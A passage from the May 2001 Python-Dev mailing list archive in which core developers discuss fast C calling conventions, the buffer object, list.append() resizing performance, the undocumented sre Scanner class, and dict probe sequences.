supported, I'd call it METH_is_hash).

> For optional arguments we'd need some convention which then
> lets the called function add the default value as needed.

For the moment, I'd only support "|O", and perhaps "|z"; an omitted
argument would be represented as a NULL pointer. That means that "|i"
couldn't participate in the fast calling convention - unless we
translate that to

void foo(PyObject*self, int i, bool ipresent);

BTW, the most frequent function in my measurements that would make use
of this convention is "OO|i:replace", which scores at 4.5%.

Regards,
Martin


From gstein@lyra.org  Fri May 25 21:27:52 2001
From: gstein@lyra.org (Greg Stein)
Date: Fri, 25 May 2001 13:27:52 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu>
Message-ID: <20010525132752.B5402@lyra.org>

On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote:
> "M.-A. Lemburg" wrote:
> > 
> > > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > > Then you could write: buffer(ob).find('.').
> > >
> > > You're totally missing the point with that suggestion. It does *not*      > > suffice to add them to buffer objects. What about array objects? mmap      > > objects?  Random Joe Object who implements the buffer interface?
> > 
> > That's the point: you can wrap all those into a buffer object
> > and then use the buffer object methods to manipulate them. In
> > that sense, buffer objects provide an adaptor to the underlying
> > object which implements the needed methods.
> 
> Sounds like you are trying to make the buffer object into something it
> is not.

The buffer object is intended to provide a Python-level object (with methods
and behavior) for any other object which exports the buffer API (but not
those particular methods/behavior).

It was added for Python 1.5.2, but did not keep up with the methods added to
the string object. Arguably, it is out of date rather than "[turning it
into] something it is not."

> Not that I have the foggiest idea what it is now, since it
> hasn't much use and is badly broken.

"badly" is overstating the problem. It caches a pointer when it shouldn't.
This doesn't work well when using it with array objects or PIL's image
objects. Most objects, it is fine.

The buffer object is also very good for C/Python extensions and embedding
code. It provides a Python-level view on a block of memory. Using a string
object implies making a copy, and it removes the possibility for read/write
access to that memory.

And you state: "Not that I have the foggiest idea what it is now". If so,
then wtf are you making statements about the buffer object's behavior?

> I like your idea of sharing functions, I just don't think the buffer
> object is the proper means.  I think the buffer object should be
> removed from Python and something better put in its place. (I'm not
> talking about the buffer C/API, though this could also use an
> overhaul, since it doesn't provide enough information to the receiving
> method.)
> 
> What I think we need is:
> 
> 1) a malloc object which has a similar interface to the mmap object
> with access protection, etc.  This object would be the fundamental way
> of getting memory.  The string object would use it to allocate a chunk
> of 'read-only' memory.  Other objects would then know not to modify
> the contents of the memory.  If you wanted a reference or view of the
> memory/buffer, you would get a reference to this object.

You're talking about the buffer object that we have *today*.

It can refer to another object (i.e. the memory exposed via the other
object's buffer API), refer to memory, or it can allocate its own memory.
The buffer object can be marked read-only, or read-write.

> 2) objects supporting the buffer object should provide a view method
> which returns a copy of themselves (and hence all their methods) and
> can be used to get a pointer to a subset of its memory.  In this way
> the type of memory/buffer being accessed is known compared to the
> current buffer object which only indicates the buffer is binary or
> char data.  In essence information about how the buffer should be used
> is lost in the current buffer C/API.

I'm not sure that I understand this paragraph.


No... what needs to happen is to have the bug in PyBufferObject fixed. Then
to refactor stringobject.c and stropmodule.c to move all of those
byte-oriented processing functions into a new file such as Python/byteops.c
(whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
would be simple covers over the same functions.

Those functions can then be used by PyBufferObject to implement the rest of
the string methods on itself.


This would leave us at MAL's suggested point: via the buffer object, we can
perform all of the standard string methods/ops on any object that implements
the buffer API.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal@lemburg.com  Fri May 25 22:16:32 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:16:32 +0200
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>
Message-ID: <3B0ECBB0.6798F4AB@lemburg.com>

Tim Peters wrote:
> 
> Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

That's what I think too. There's really not much point in trying
to work around poor malloc() implementations when we've already
got the cure built into Python... I just wish Vladimir would 
resurface again to complete his great work (AFAIK, pymalloc still
has problems with threads).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 25 22:38:15 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:38:15 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
Message-ID: <3B0ED0C7.F1A665EA@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Now this would be more flexible if you would implement a scheme
> > which lets us put the parser string into the method list. The
> > call mechanism could then easily figure out how to call the
> > method and it would also be more easily extensible:
> >
> >  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},
> 
> I'd like to hear other people's comment on this specific issue, so I
> guess I should probably write a PEP outlining the options.
> 
> My immediate reaction to your proposal is that it only complicates the
> interface without any savings. We still can only support a limited
> number of calling conventions. E.g. it is not possible to write
> portable C code that does all the calling conventions for "l", "ll",
> "lll", "llll", and so on - you have to cast the function pointer to
> the right prototype, which must be done in source code.
>
> So with this interface, you may end up at run-time finding out that
> you cannot support the signature. With the current patch, you'd have
> to know to convert "OO" into METH_OO, which I think is not asked too
> much - and it gives you a compile-time error if you use an unsupported
> calling convention.

True. It's unfortunate that C doesn't offer the reverse of
varargs.h...
 
> > A parser marker "OO" would then call a method like this:
> >
> >  method(self, arg0, arg1)
> >
> > and so on.
> 
> That is indeed the plan, but since you have to code the parameter
> combinations in C code, you can only support so many of them.
> 
> > allows implementing a generic scheme which
> > then again relies on PyArg_ParseTuple() to do the argument
> > parsing, e.g. "is#" could be implemented as:
> 
> The point of the patch is to get rid of PyArg_ParseTuple in the
> "common case". For functions with complex calling conventions, getting
> rid of the PyArg_ParseTuple string parsing is not that important,
> since they are expensive, anyway (not that "is#" couldn't be
> supported, I'd call it METH_is_hash).
> 
> > For optional arguments we'd need some convention which then
> > lets the called function add the default value as needed.
> 
> For the moment, I'd only support "|O", and perhaps "|z"; an omitted
> argument would be represented as a NULL pointer. That means that "|i"
> couldn't participate in the fast calling convention - unless we
> translate that to
> 
> void foo(PyObject*self, int i, bool ipresent);
> 
> BTW, the most frequent function in my measurements that would make use
> of this convention is "OO|i:replace", which scores at 4.5%.

I was thinking of using pointer indirection for this:

	foo(PyObject *self, int *i)

If i is given as argument, *i is set to the value, otherwise
i is set to NULL.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Fri May 25 23:11:43 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 25 May 2001 18:11:43 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEIMKEAA.tim.one@home.com>

[Tim]
> Long-term we should teach PyMalloc about Python's realloc()
> abuses and craft a cooperative solution.

[MAL]
> That's what I think too. There's really not much point in trying
> to work around poor malloc() implementations when we've already
> got the cure built into Python...

The point *here* is that a simple localized patch could kill off a
Frequently Irritating Complaint without further ado:  on my personal
cost/benefit scale, it's all I can *afford* to do now.  PyMalloc likely
won't solve it as-is x-platform, without new work to accommodate extreme
realloc() abuse.

> I just wish Vladimir would resurface again to complete his great
> work

I'd like him to come back even if he doesn't <wink>.

> (AFAIK, pymalloc still has problems with threads).

It has lock macros that haven't been #define'd to do anything yet.  But part
of the potential value of the Python core using its own allocator is to
exploit the global interpreter lock to *not* lock in the allocator.  Messy
issues.  Python should grow a cheaper platform-specific flavor of internal
lock too.  (Jeremy pointed out some code the other day that jumps through
hoops to simulate a reentrant lock on top of a Python lock; an irony is that
on Windows, the native lock *is* reentrant already, and Python jumps through
hoops to make it act as if it weren't <wink>)


From mal@lemburg.com  Fri May 25 23:07:00 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 00:07:00 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org>
Message-ID: <3B0ED784.FC53D01@lemburg.com>

Greg Stein wrote:
> 
> No... what needs to happen is to have the bug in PyBufferObject fixed. Then
> to refactor stringobject.c and stropmodule.c to move all of those
> byte-oriented processing functions into a new file such as Python/byteops.c
> (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
> would be simple covers over the same functions.
> 
> Those functions can then be used by PyBufferObject to implement the rest of
> the string methods on itself.
> 
> This would leave us at MAL's suggested point: via the buffer object, we can
> perform all of the standard string methods/ops on any object that implements
> the buffer API.

I wonder how we could achieve this without copy&pasting all
the needed methods from stringobject.c to bufferobject.c....
all the string methods use the string object layout directly
rather than just dealing with a pointer and a length.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From m.favas@per.dem.csiro.au  Sat May 26 03:34:20 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 10:34:20 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au>

[Tim wants to know whether his patch to listobject.c slows anything down
on anyone's "oddball box"...]

While in no way admitting that mine is an oddball box <wink>, it being a
Tru64 Unix alpha processor machine, I do see a slowdown after applying
the patch (measured on the test suite and on pystone). However, it's
only of the order of 0.5 to 1%.

slightly-oddly y'rs  - Mark

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From tim.one@home.com  Sat May 26 05:05:40 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 00:05:40 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>

[Mark Favas]
> [Tim wants to know whether his patch to listobject.c slows anything down
> on anyone's "oddball box"...]
>
> While in no way admitting that mine is an oddball box <wink>,

Heh -- of course not.  I had more in mind obscure OSes like Linux <wink>.

> it being a Tru64 Unix alpha processor machine, I do see a slowdown
> after applying the patch (measured on the test suite and on pystone).
> However, it's only of the order of 0.5 to 1%.

Now that's very odd, since Alpha has about the slowest integer divsion on
Earth, and every list append was doing an int div before the patch but not
after.

I'm afraid that timing the test suite before and after is a red herring, as
several of the expensive tests have (pseudo)random components and can do an
amount of work that varies depending on system time at the time random.py is
first imported.

pystone is even odder:  the relevant code in listobject.c is never executed
during pystone!  I suspected that because pystone is an old synthetic Ada
benchmark simulating a pile of integer systems programs, so pystone is
unique among Python programs in not exercising any of Python's useful
features <wink> -- a breakpoint in the debugger just now confirmed it (never
did a list resize after compilation finished).

So I'm pretty sure that after I check it in, you'll see a speedup instead
<wink>.

Get anywhere identifying why your other app is 20% slower (blast from the
past)?


From martin@loewis.home.cs.tu-berlin.de  Sat May 26 06:28:32 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 26 May 2001 07:28:32 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com>
Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>

> I was thinking of using pointer indirection for this:
> 
> 	foo(PyObject *self, int *i)
> 
> If i is given as argument, *i is set to the value, otherwise
> i is set to NULL.

That is a good idea; I'll try to update my patch to more calling
conventions.

Regards,
Martin


From tim.one@home.com  Sat May 26 07:44:04 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 02:44:04 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0ED784.FC53D01@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>

The buffer object has been neglected for years:  is that because it's in
prime shape, or because nobody cares about it enough to maintain it?  "The
bug" has been known for years without any action taken to address it; the
docs give up in spots and nobody addresses that either (like "The current
policy seems to state that these characters may be multi-byte characters" --
well, yes or no?); the builtin buffer() function isn't called anywhere in
the std test suite; the file object still has an undocumented readinto()
method that just confuses people who bump into it; and it's so obscure in
daily life that it appears Guido didn't even think of it when adding
iterators for the other sequence types.

I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
champion it now?  That would be cool.

About combining strop and buffers and strings, don't forget unicodeobject.c:
that's got oodles of basically duplicate code too.  /F suggested dealing
with the minor differences via maintaining one code file that gets compiled
multiple times w/ appropriate #defines.


From tim.one@home.com  Sat May 26 09:14:06 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 04:14:06 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>

I don't want to see us duplicate the guts of PyArg_ParseTuple() inside
do_call_special().  METH_O is a cool idea, METH_l is marginal, and the new
code is already slower for METH_O than it needs to be in order to support
the *possibility* of METH_l too (stacks and loops and switch stmts and an
extra layer of do_call_special function call "just in case").

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend <wink>.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


From m.favas@per.dem.csiro.au  Sat May 26 09:30:29 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 16:30:29 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>
Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au>

[Tim tells Mark that his observations reflect more Brownian motion
(pseudo!) than reality...]

> [Mark Favas]
> > it being a Tru64 Unix alpha processor machine, I do see a slowdown
> > after applying the patch (measured on the test suite and on pystone).
> > However, it's only of the order of 0.5 to 1%.
> 
> Now that's very odd, since Alpha has about the slowest integer divsion on
> Earth, and every list append was doing an int div before the patch but not
> after.
> 
> I'm afraid that timing the test suite before and after is a red herring, as
> several of the expensive tests have (pseudo)random components and can do an
> amount of work that varies depending on system time at the time random.py is
> first imported.
> 
> pystone is even odder:  the relevant code in listobject.c is never executed
> during pystone!  I suspected that because pystone is an old synthetic Ada
> benchmark simulating a pile of integer systems programs, so pystone is
> unique among Python programs in not exercising any of Python's useful
> features <wink> -- a breakpoint in the debugger just now confirmed it (never
> did a list resize after compilation finished).
> 
> So I'm pretty sure that after I check it in, you'll see a speedup instead
> <wink>.

OK <grin>: this time, instead of making unwarranted assumptions about
test suites and pystones <wink>, I wrote and ran a test that I _think_
should exercise the code (at least, it does lots of list.append()s),
and, yes, the newly checked-in code's about 3-4% faster compared with
the original version of, well, days ago.

> 
> Get anywhere identifying why your other app is 20% slower (blast from the
> past)?

No, not yet. The profiling results at first eyeball seemed hard to match
up, so I put it off for a rainy weekend. And Perth's drought has just
broken... Will attempt to make sense of it. Interesting that Marc Andre
seemed to get a somewhat similar slowdown between 1.52 and 2.0.

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From mal@lemburg.com  Sat May 26 10:54:12 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 11:54:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
Message-ID: <3B0F7D44.1A12CE0F@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > I was thinking of using pointer indirection for this:
> >
> >       foo(PyObject *self, int *i)
> >
> > If i is given as argument, *i is set to the value, otherwise
> > i is set to NULL.
> 
> That is a good idea; I'll try to update my patch to more calling
> conventions.

This morning another idea popped up which could help us with
handling generic callings schemes:

	How about making *all* parameters pointers ?!

The calling mechanism would then just have to deal with an
changing number of parameters and not with different types
(this is how PyArg_ParseTuple() works too if I remember correctly).

We could easily provide calling schemes for 1 - n arguments
that way and the types of these arguments would be defined
by the parser string just like before.

Examples:

	foo(PyObject *self, PyObject *obj, int *i)
	bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these
to:

	foo(void *, void *, void *)
	bar(void *, void *, void *, void *, void *)

Wouldn't this work ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paulp@ActiveState.com  Sat May 26 16:02:08 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Sat, 26 May 2001 08:02:08 -0700
Subject: [Python-Dev] Scanner
Message-ID: <3B0FC570.17707787@ActiveState.com>

What ever happened to the sre Scanner? It seemed like a good idea but it
was not documented and it doesn't work for me. Is it just a case of
nobody got around to the documentation or have we decided against it?

Here's the code that doesn't work for me:

from sre import Scanner

scanner = Scanner([
    (r"[a-zA-Z_]\w*", None),
    (r"\d+\.\d*", None),
    (r"\d+", None),
    (r"=|\+|-|\*|/", None),
    (r"\s+", None),
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

Traceback (most recent call last):
  File "junk.py", line 11, in ?
    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  File "c:\program files\python21\lib\sre.py", line 254, in scan
    action = self.lexicon[m.lastindex][1]
TypeError: sequence index must be integer

m.lastindex is None
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mal@lemburg.com  Sat May 26 16:47:47 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 17:47:47 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <3B0FD023.C4588919@lemburg.com>

Tim Peters wrote:
> 
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?  "The
> bug" has been known for years without any action taken to address it; the
> docs give up in spots and nobody addresses that either (like "The current
> policy seems to state that these characters may be multi-byte characters" --
> well, yes or no?); the builtin buffer() function isn't called anywhere in
> the std test suite; the file object still has an undocumented readinto()
> method that just confuses people who bump into it; and it's so obscure in
> daily life that it appears Guido didn't even think of it when adding
> iterators for the other sequence types.
> 
> I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
> champion it now?  That would be cool.

I believe that nobody really likes the buffer interface enough to
let the world know about it, except maybe Greg ;-)

Even the idea of replacing the usage of strings as data buffers
with buffer object didn't get very far; common habits are simply
hard to break.

> About combining strop and buffers and strings, don't forget unicodeobject.c:
> that's got oodles of basically duplicate code too.  /F suggested dealing
> with the minor differences via maintaining one code file that gets compiled
> multiple times w/ appropriate #defines.

Hmm, that only saves us a few kB in source, but certainly not
in the object files. 

The better idea would be making the types subclass from a generic 
abstract string object -- I just don't know how this will be 
possible with Guido's type patches. We'll just have to wait, 
I guess.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Sat May 26 22:15:11 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 17:15:11 -0400
Subject: [Python-Dev] Scanner
In-Reply-To: <3B0FC570.17707787@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKJKEAA.tim.one@home.com>

[Paul Prescod]
> What ever happened to the sre Scanner? It seemed like a good idea
> but it was not documented

I previously urged /F to document, and Python-Dev to accept, the .lastindex
and .lastgroup match object extensions, but to date <wink> got no response.
Whether to adopt the Scanner class too is fuzzier, since AFAICT almost
nobody has figured out how to use it.

> and it doesn't work for me.

This isn't a code problem, it's a failure to reverse-engineer the
undocumeted API <wink>.

> Is it just a case of nobody got around to the documentation or have
> we decided against it?

WRT Scanner, partly the former, nothing of the latter, mostly that there's
been no discussion of the API at all.

WRT lastindex and lastgroup, I think purely the former.

> Here's the code that doesn't work for me:
>
> from sre import Scanner
>
> scanner = Scanner([
>     (r"[a-zA-Z_]\w*", None),
>     (r"\d+\.\d*", None),
>     (r"\d+", None),
>     (r"=|\+|-|\*|/", None),
>     (r"\s+", None),
>     ])

1. Every tokenization regexp must contain exactly one capturing group.
   The lack above is the source of your later TypeError.  Unclear to
   me whether that was the intent, or ust the way the code happens to
   work today.

2. When an action is None, the substring matched by the pattern will
   be thrown away.  You need to supply non-None actions if you want
   anything to show up in the token list.

> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>
> Traceback (most recent call last):
>   File "junk.py", line 11, in ?
>     tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>   File "c:\program files\python21\lib\sre.py", line 254, in scan
>     action = self.lexicon[m.lastindex][1]
> TypeError: sequence index must be integer
>
> m.lastindex is None

Here's a working rewrite:

from sre import Scanner

def retrieve(scanner, group):
    return group

scanner = Scanner([
    (r"([a-zA-Z_]\w*)", retrieve),
    (r"(\d+\.\d*)", retrieve),
    (r"(\d+)", retrieve),
    (r"(=|\+|-|\*|/)", retrieve),
    (r"(\s+)", None),  # ignore whitespace
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
print tokens, `tail`

That prints

['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''


In return for that, how about *you* supply a works-on-Windows rewrite of
test_urllib2.py?  You know more about that than anyone, and the test has
been failing for weeks.


From MarkH@ActiveState.com  Sun May 27 03:39:43 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Sun, 27 May 2001 12:39:43 +1000
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>

[Tim]
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?

My take is a little different.  I think people could be convinced to care
about it, and indeed I do.  However, it has one fatal flaw, and no one seems
to know what to do about it.

The problem is the one best demonstrated with the array module - if you get
a pointer to the buffer interface for an array object, but the array then
resizes itself, the buffer pointer dangles.

There have been a few attempts over time to raise the buffer profile, but
this design flaw leaves people scratching their head - it is hard to press
for adoption of a feature that has a known crash hiding away.

However, addressing this problem is difficult.  Guido appears unconvinced
that buffer objects and interfaces are that worthwhile.  It appears no one
else knows how to proceed in the face of this ambivalence - that describes
my take even if no one elses.

The-buffer-is-dead,-long-live-the-buffer ly,

Mark.


From tim.one@home.com  Sun May 27 07:34:53 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 02:34:53 -0400
Subject: [Python-Dev] Next dict crusade
Message-ID: <LNBBLJKPBEHFEDALKOLCKELEKEAA.tim.one@home.com>

I'm still trying to work off the backlog of ignored dict ideas.  Way back
here:

    http://mail.python.org/pipermail/python-dev/2000-December/011085.html

Christian Tismer suggested using polynomial division instead of
multiplication for generating the probe sequence, as a way to get all the
bits of the hash code into play.  The desirability of doing that is
illustrated by, e.g., this program:

def f(keys):
    from time import clock

    d = {}

    s = clock()
    for k in keys:
        d[k] = k
    f = clock()
    print "build time %.3f" % (f-s)

    s = clock()
    for k in keys:
        assert d.has_key(k)
    f = clock()
    print "search time %.3f" % (f-s)

# Excellent performance.
keys = range(20000)
for i in range(5):
    f(keys)

# Terrible performance; > 500x slower.
keys = [i << 16 for i in range(20000)]
for i in range(5):
    f(keys)

Christian had a very clever (cheap and effective) solution:

    Old algortithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

where "index" should really read "increment", and unlike today we do not
mask off any of the bits of the initial increment (and that's what lets
*all* the bits of the hash code come into play; there's no point to doing
this otherwise).

I've since discovered that it's got a fatal rare flaw:  the new algorithm
can generate a 0 increment, while the old algorithm cannot.

Example:  poly is 131 and hash is 145.  Because we don't mask off any bits
in computing the initial increment, the initial increment is computed as

    incr = hash ^ (hash >> 3) ==
           145 ^ (145 >> 3) ==
           145 ^ 18 ==
           131 ==
           poly

So if we don't hit on the first probe, the new

       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed
point).  I hate to add another branch to this.  As is, the existing branch
in both the old and new ways is of the worst possible kind:  it's taken half
the time, with a pseudo-random distribution.  So there's not a
branch-prediction gimmick on earth it won't fool.

Note that there's no reasonable way to identify "bad values" for incr before
the loop starts, either -- there's really no way to tell whether incr mod
poly is 0 without a loop to do division steps until incr < poly (if incr <
poly and incr != 0, incr can never become 0, so there's no more need to test
after reaching that point).  Such a "pre loop" would cost more than the
existing loop in most cases, as we usually get out of the existing loop
today on its first iteration.

But in that case, what am I worried about <wink>?

time-for-a-checkin-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Sun May 27 10:01:14 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 27 May 2001 11:01:14 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com>
Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>

> To call these, the calling mechanism would have to cast these
> to:
> 
> 	foo(void *, void *, void *)
> 	bar(void *, void *, void *, void *, void *)
> 
> Wouldn't this work ?

I think it would work, but I doubt it would save much compared to the
existing approach. The main point of this patch is to improve
efficiency, and (according to Jeremy's analysis), most of the time for
calling a function is spend in PyArg_ParseTuple. So if we replace it
with another interface that also relies on parsing a string, I doubt
we'll improve efficiency.

IOW, I won't implement that approach. If you do, I'd be curious to
hear the results, of course.

Regards,
Martin

P.S. There would be still cases where PyArg_ParseTuple is needed,
e.g. for "O!".


From mal@lemburg.com  Sun May 27 11:26:27 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:26:27 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <3B10D653.4D81E280@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > To call these, the calling mechanism would have to cast these
> > to:
> >
> >       foo(void *, void *, void *)
> >       bar(void *, void *, void *, void *, void *)
> >
> > Wouldn't this work ?
> 
> I think it would work, but I doubt it would save much compared to the
> existing approach. The main point of this patch is to improve
> efficiency, and (according to Jeremy's analysis), most of the time for
> calling a function is spend in PyArg_ParseTuple. So if we replace it
> with another interface that also relies on parsing a string, I doubt
> we'll improve efficiency.

That's the point: we are not replacing PyArg_ParseTuple()
with another parsing mechanism, we are only using PyArg_ParseTuple()
as fallback solution for parser strings for which we don't
provide a special case implementation.

The idea is to simply do a strcmp() (*) for a few common
combinations (like e.g. "O" and "OO") and then provide the
same special case handling like you do with e.g. METH_O.
The result would be almost the same w/r to performance
and code reduction as with your approach. The only addition
would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still
provide special case handling of common parser strings, you
can also provide generic APIs for most other parser strings
by reverting to PyArg_ParseTuple() for these.

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would be still cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Sun May 27 11:30:48 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
> 
